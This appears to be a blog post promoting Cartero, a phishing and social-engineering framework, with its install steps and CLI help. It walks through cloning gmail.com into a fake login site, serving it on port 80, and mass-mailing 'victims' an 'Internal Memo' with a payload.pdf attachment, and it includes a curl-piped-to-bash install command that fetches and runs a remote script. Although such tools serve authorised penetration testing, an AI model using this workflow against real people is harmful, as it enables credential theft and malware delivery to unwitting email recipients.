Cartero – Social Engineering Framework

A robust Phishing Framework with a full featured CLI interface. The project was born out necessity through of years of engagements with tools that just didn’t do the job. Even though there are many projects out there, we were not able to find a suitable solution that gave us both easy of use and customizability.

Cartero is a modular project divided into commands that perform independent tasks (i.e. Mailer, Cloner, Listener, AdminConsole, etc…). In addition each sub-command has repeatable configuration options to configure and automate your work.

For example, if we wanted to clone gmail.com, we simply have to perform the following commands.

./cartero Cloner --url https://gmail.com --path /tmp --webserver gmail_com
./cartero Listener --webserver /tmp/gmail_com -p 80
Launching mongodb
Puma starting in single mode...
* Version 2.8.2 (ruby 2.1.1-p76), codename: Sir Edmund Percival Hillary
* Min threads: 4, max threads: 16
* Environment: production
* Listening on tcp://0.0.0.0:80
Use Ctrl-C to stop

Once we have a site up and running we can simply use the Mailer command to send templated emails to our victims:

./cartero Mailer --data victims.json --server gmail_com --subject "Internal Memo" --htmlbody email_html.html --attachment payload.pdf --from "John Doe <[email protected]>"
Sending [email protected]
Sending [email protected]
Sending [email protected]

Installation

Automated Installation

Using brew 2.1.5 ruby as default ruby library

curl -L https://raw.githubusercontent.com/Section9Labs/Cartero/master/data/scripts/setup.sh | bash

Dependencies:

Ruby, Mongodb

Framework

git clone https://github.com/section9labs/Cartero
cd Cartero
gem install bundle
bundle install
cd bin

Usage

Commands

Cartero is a very powerful easy to use CLI.

./cartero
Usage: cartero [options]

List of Commands:
    AdminConsole, AdminWeb, Mailer, Cloner, Listener, Servers, Templates

Global options:
        --proxy [HOST:PORT]          Sets TCPSocket Proxy server
    -c, --config [CONFIG_FILE]       Provide a different cartero config file
    -v, --[no-]verbose               Run verbosely
    -p [PORT_1,PORT_2,..,PORT_N],    Global Flag fo Mailer and Webserver ports
        --ports
    -m, --mongodb [HOST:PORT]        Global Flag fo Mailer and Webserver ports
    -d, --debug                      Sets debug flag on/off
        --editor [EDITOR]            Edit Server


Common options:
    -h, --help [COMMAND]             Show this message
        --list-commands              Prints list of commands for bash completion
        --version                    Shows cartero CLI version

Download Cartero

TagsCartero Engineering Framework Man In The Middle MITM MITM Framework phishing Phishing Framework Social Social Engineering Framework

About the author

Mazen Elzanaty

Add Comment

Cancel reply